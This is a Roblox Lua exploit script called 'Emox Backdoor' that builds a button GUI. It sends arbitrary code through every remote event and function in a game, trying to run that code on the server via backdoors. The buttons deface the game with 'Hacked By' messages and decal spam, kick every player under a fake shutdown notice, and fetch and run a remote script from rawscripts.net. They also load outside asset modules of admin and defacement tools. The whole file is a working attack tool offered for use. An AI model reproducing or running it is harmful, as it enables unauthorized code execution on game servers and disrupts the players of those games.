--[[ Emox Backdoor(not my code Edited Code) ]] local LMG2L = {}; local LP = game:GetService("Players").LocalPlayer -- GUI Ana Yapısı local targetParent = game:GetService("CoreGui") or LP:WaitForChild("PlayerGui") LMG2L["ScreenGui_1"] = Instance.new("ScreenGui", targetParent); LMG2L["ScreenGui_1"].ResetOnSpawn = false LMG2L["ScreenGui_1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling; LMG2L["Frame_2"] = Instance.new("Frame", LMG2L["ScreenGui_1"]); LMG2L["Frame_2"]["BorderSizePixel"] = 3; LMG2L["Frame_2"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0); LMG2L["Frame_2"]["Size"] = UDim2.new(0, 436, 0, 362); LMG2L["Frame_2"]["Position"] = UDim2.new(0.5, -218, 0.5, -181); LMG2L["Frame_2"]["BorderColor3"] = Color3.fromRGB(255, 255, 255); LMG2L["TextLabel_3"] = Instance.new("TextLabel", LMG2L["Frame_2"]); LMG2L["TextLabel_3"]["TextSize"] = 14; LMG2L["TextLabel_3"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0); LMG2L["TextLabel_3"]["TextColor3"] = Color3.fromRGB(255, 255, 255); LMG2L["TextLabel_3"]["Size"] = UDim2.new(0, 300, 0, 14); LMG2L["TextLabel_3"]["Text"] = [[Emox Backdoor(not my code Edited Code)]]; LMG2L["TextLabel_3"]["Position"] = UDim2.new(0, 68, 0, 16); LMG2L["TextBox_4"] = Instance.new("TextBox", LMG2L["Frame_2"]); LMG2L["TextBox_4"]["Visible"] = false; LMG2L["UIDragDetector_5"] = Instance.new("UIDragDetector", LMG2L["Frame_2"]); -- SAYFA SİSTEMİ local Page1 = Instance.new("ScrollingFrame", LMG2L["Frame_2"]) Page1.Size = UDim2.new(1, -10, 1, -50); Page1.Position = UDim2.new(0, 5, 0, 40); Page1.BackgroundTransparency = 1; Page1.Visible = true; Page1.CanvasSize = UDim2.new(0, 0, 1.2, 0); Page1.ScrollBarThickness = 4 local Page2 = Instance.new("ScrollingFrame", LMG2L["Frame_2"]) Page2.Size = UDim2.new(1, -10, 1, -50); Page2.Position = UDim2.new(0, 5, 0, 40); Page2.BackgroundTransparency = 1; Page2.Visible = false; Page2.CanvasSize = UDim2.new(0, 0, 1.6, 0); Page2.ScrollBarThickness = 4 -- GÜÇLENDİRİLMİŞ EXECUTE (Require/Loadstring Desteği) local function executeCode(code) if code == "" then return end local RS = game:GetService("ReplicatedStorage") for _, r in ipairs(RS:GetDescendants()) do if r:IsA("RemoteEvent") then r:FireServer(code) pcall(function() r:FireServer("loadstring([["..code.."]])()") end) elseif r:IsA("RemoteFunction") then pcall(function() r:InvokeServer(code) end) pcall(function() r:InvokeServer("loadstring([["..code.."]])()") end) end end end ----------------------------------------------------------- -- PAGE 1: ESKİ BUTONLAR ----------------------------------------------------------- local function createP1Btn(name, pos, code) local b = Instance.new("TextButton", Page1) b.Size = UDim2.new(0, 90, 0, 40); b.Position = pos; b.Text = name b.BackgroundColor3 = Color3.fromRGB(0,0,0); b.TextColor3 = Color3.fromRGB(255,255,255); b.BorderSizePixel = 2 b.MouseButton1Click:Connect(function() LMG2L["TextBox_4"].Text = code; executeCode(code) end) return b end createP1Btn("Scan", UDim2.new(0, 10, 0, 10), LMG2L["TextBox_4"].Text) createP1Btn("Skybox", UDim2.new(0, 110, 0, 10), [[local s = Instance.new("Sky", game.Lighting) s.SkyboxBk = "rbxassetid://70654252104587"]]) createP1Btn("Theme", UDim2.new(0, 210, 0, 10), [[local s = Instance.new("Sound", workspace) s.SoundId = "rbxassetid://106454968477932" s:Play()]]) createP1Btn("Particles", UDim2.new(0, 310, 0, 10), [[for _,v in pairs(game.Players:GetPlayers()) do Instance.new("ParticleEmitter", v.Character.Head) end]]) createP1Btn("Hint", UDim2.new(0, 10, 0, 60), [[Instance.new("Hint", workspace).Text = "Emoxby31 Was Here"]]) createP1Btn("Decal Spam", UDim2.new(0, 110, 0, 60), [[function ex(r) for _,v in pairs(r:GetChildren()) do if v:IsA("BasePart") then Instance.new("Decal",v).Texture="rbxassetid://118793674734574" end ex(v) end end ex(workspace)]]) createP1Btn("Face All", UDim2.new(0, 210, 0, 60), [[loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Snoop-Dogg-face-all-116660"))()]]) createP1Btn("Message", UDim2.new(0, 310, 0, 60), [[local M = Instance.new("Message", workspace) M.Text = "Hacked By Emoxby31"]]) createP1Btn("666", UDim2.new(0, 10, 0, 110), [[game.Lighting.Ambient = Color3.new(1,0,0)]]) createP1Btn("Shutdown", UDim2.new(0, 110, 0, 110), [[for _,p in pairs(game.Players:GetPlayers()) do p:Kick("Server Shutdown") end]]) -- PAGE 1 SON BUTON (SAYFA DEĞİŞTİR) local NextBtn1 = Instance.new("TextButton", Page1) NextBtn1.Size = UDim2.new(0, 90, 0, 40); NextBtn1.Position = UDim2.new(0, 210, 0, 110); NextBtn1.Text = "Next Page >" NextBtn1.BackgroundColor3 = Color3.fromRGB(30, 30, 30); NextBtn1.TextColor3 = Color3.fromRGB(255, 255, 255); NextBtn1.BorderSizePixel = 2 NextBtn1.MouseButton1Click:Connect(function() Page1.Visible = false; Page2.Visible = true end) ----------------------------------------------------------- -- PAGE 2: REQUIRE BUTONLARI ----------------------------------------------------------- local function createP2Btn(name, pos, reqId, method, useName) local b = Instance.new("TextButton", Page2) b.Size = UDim2.new(0, 130, 0, 40); b.Position = pos; b.Text = name b.BackgroundColor3 = Color3.fromRGB(0,0,0); b.TextColor3 = Color3.fromRGB(255,255,255); b.BorderSizePixel = 2 b.MouseButton1Click:Connect(function() local code = "" if useName then code = 'require('..reqId..').'..method..'("'..LP.Name..'")' else code = 'require('..reqId..').'..method..'()' end LMG2L["TextBox_4"].Text = code executeCode(code) end) end createP2Btn("DummySpawner", UDim2.new(0, 10, 0, 10), "130680206336655", "DummySpawner", true) createP2Btn("Stigma", UDim2.new(0, 150, 0, 10), "132938459666886", "stigma", true) createP2Btn("Teamfat", UDim2.new(0, 290, 0, 10), "13772265165", "TeamFatGUICrackedByLua", true) createP2Btn("Pop Up", UDim2.new(0, 10, 0, 60), "10557341183", 'alert("'..LP.Name..'", "Hacked By '..LP.Name..'") --', false) createP2Btn("Mosque(Cami)", UDim2.new(0, 150, 0, 60), "131945008071397", "map", true) createP2Btn("Pepsi GUI", UDim2.new(0, 290, 0, 60), "113825094179678", "pepsi", true) createP2Btn("Tubers93 Realm", UDim2.new(0, 10, 0, 110), "11822002067", "Lmao", false) createP2Btn("RC7", UDim2.new(0, 150, 0, 110), "12350030542", "RC7", true) -- PAGE 2 SON BUTON (SAYFA DEĞİŞTİR) local PrevBtn2 = Instance.new("TextButton", Page2) PrevBtn2.Size = UDim2.new(0, 130, 0, 40); PrevBtn2.Position = UDim2.new(0, 290, 0, 110); PrevBtn2.Text = "< Prev Page" PrevBtn2.BackgroundColor3 = Color3.fromRGB(30, 30, 30); PrevBtn2.TextColor3 = Color3.fromRGB(255, 255, 255); PrevBtn2.BorderSizePixel = 2 PrevBtn2.MouseButton1Click:Connect(function() Page1.Visible = true; Page2.Visible = false end) print("Emox Backdoor: Sayfa butonu sona eklendi!")